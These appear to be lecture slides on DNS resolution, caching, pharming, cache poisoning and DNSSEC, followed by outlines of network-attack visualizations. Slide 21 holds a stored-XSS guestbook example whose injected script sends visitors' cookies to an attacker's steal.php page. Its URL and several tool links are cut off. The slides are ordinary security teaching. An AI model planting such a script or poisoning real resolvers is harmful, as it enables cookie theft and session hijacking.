Slide 1: Computer Networks: Domain Name System
Slide 2: Domain Name System
The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses.
Slide 3: Iterative Name Resolution
(Figure: the application's resolver cache asks the local name server, which queries the root server (1), then the .com server (2), then the google.com server (3), each holding its own resolver cache, and returns the final answer.)
Slide 4: Name Resolution
Resolution method when the answer is not in the cache:
(Figure: the client asks its ISP DNS server where a name is; the root name server replies "Try the com nameserver", the com server replies "Try the example.com nameserver", and the example.com server supplies the answer.)
Slide 5: DNS Caching
Step 1: query yourdomain.org. (Figure: the application's resolver cache on the local machine sends the query to the local NS resolver cache, which queries the authoritative name server.)
Step 2: receive the reply and cache it at both the local NS and the host. (Figure: the answer returns from the authoritative name server through the local NS resolver cache to the local machine.)
Slide 6: DNS Caching (cont'd)
Step 3: use cached results rather than querying the ANS. (Figure: local machine 2 queries the local NS, which answers from its resolver cache without contacting the authoritative server.)
Step 4: evict cache entries upon TTL expiration.
Slide 7: Pharming: DNS Hijacking
Changing the IP address associated with a server maliciously. (Figure: under normal DNS the "My Premium Blog Spot" login form (userID, password) is served by the legitimate host; under a pharming attack the same name resolves to the attacker's copy of the site.) Phishing: the different web sites look the same.
Slide 8: DNS Cache Poisoning
Basic idea: give DNS servers false records and get them cached.
DNS uses a 16-bit request identifier to pair queries with answers.
The cache may be poisoned when a name server:
- disregards identifiers
- has predictable IDs
- accepts unsolicited DNS records
There are three main ways to do DNS cache poisoning. The first relies on redirecting the nameserver of the attacker's domain to the nameserver of the target domain, and then assigning this target nameserver a fake IP address. The second variant relies on redirecting the nameserver of another, unrelated domain to a fake nameserver. The third variant just involves "racing" the real nameserver to give an answer.
Slide 9: DNS Cache Poisoning Prevention
- Use random identifiers for queries
- Always check identifiers
- Port randomization for DNS requests
- Deploy DNSSEC (challenging because it is still being deployed and requires reciprocity)
Slide 10: DNSSEC
Guarantees:
- authenticity of the DNS answer's origin
- integrity of the reply
- authenticated denial of existence
Accomplishes this by signing DNS replies at each step of the way, using public-key cryptography to sign responses. Typically uses trust anchors, entries configured in the OS, to bootstrap the process.
Slide 11: DNS Signing
(Figure only.)
Slide 12: DNSSEC Deployment
As the internet becomes regarded as critical infrastructure there is a push to secure DNS. NIST is in the process of deploying it on root servers now. It may add considerable load to DNS servers, with packet sizes considerably larger than the 512-byte size of UDP DNS packets. There are political concerns with the US controlling the root level of DNS.
Slide 13: Development steps
- Work on the following lab first to understand DNS pharming and cache poisoning attacks.
- Learn the basics of HTML5.
- Design scenarios of DNS attacks.
- Implementation and user study.
Slide 14: Experience DNS attacks
DNS pharming attack lab from Kevin Du's SEED labs at Syracuse University: ks_DNS/
Slide 15: HTML5, the new standard for HTML
- New elements, new attributes, full CSS3 support, video and audio, 2D/3D graphics, local storage, local SQL database, web applications
- New features should be based on HTML, CSS, DOM, and JavaScript
- Reduce the need for external plugins (like Flash)
- Better error handling
- More markup to replace scripting
- HTML5 should be device independent
URL:
Slide 16: Interactive Security Visualization
9/20/2018 UTC/CSE
Slide 17: Network Security Visualization – Packet Sniffer
A packet sniffer is a program that captures all of the packets of data that pass through a given network interface, and recognizes and decodes certain packets of interest.
sual_tools/packet_sniffer/packet_sniffer.html
Slide 18: Network Security Visualization – Wireless Network Attacks Simulator
Eavesdropping: The attacker configures his/her network interface into promiscuous mode, which allows a network device to read each network packet that arrives at the device.
Evil Twin: An evil twin is a wireless access point (AP) that masquerades as a legitimate one.
Man in the Middle: The attacker intercepts the traffic between two computers. The attacker sniffs packets from the network, may modify the packets, and inserts them back into the network.
ARP Cache Poisoning: Address Resolution Protocol (ARP) is a network layer protocol used to associate an IP address with a MAC address. A network device has an ARP cache, which contains all the IP addresses and MAC addresses the device has already matched together.
ttacks/wireless_attacks.html
Slide 19: Network Security Visualization – SYN Flood
SYN flood, one of the denial-of-service attacks.
sual_tools/SYNFloodDemo/index.htm
Slide 20: Network Security Visualization – Web Security
Cross-site scripting: the attacker injects scripting code into pages generated by a web application.
- The script could be malicious code: JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash
- Threats: phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising, execution of code on the client, ...
Slide 21: XSS Example
The website allows posting of comments in a guestbook; the server incorporates the comments into the page it returns.

guestbook.html (the form visitors use to sign):

    <html>
      <head><title>Sign My Guestbook!</title></head>
      <body>
        Sign my guestbook!
        <form action="sign.php" method="POST">
          <input type="text" name="name">
          <input type="text" name="message" size="40">
          <input type="submit" value="Submit">
        </form>
      </body>
    </html>

The page returned to later visitors:

    <html>
      <head><title>My Guestbook!</title></head>
      <body>
        Thanks for signing my guestbook!<br />
        Here's what everyone else had to say:<br />
        Joe: Hi! <br />
        John: Hello, how are you? <br />
        Jane: How does this guestbook work? <br />
      </body>
    </html>

A comment that includes malicious JavaScript:

    Evilguy: <script> document.location = " </script>

This redirects the visitor to the attacker's site and concatenates the user's cookies to the URL as a GET parameter for the steal.php page. If sign.php copies whatever the user types in the post form into the content of the guest book, the injected script is sent to every other user who views the page.
Slide 22: Animation of XSS
Simple Flash animation (under development).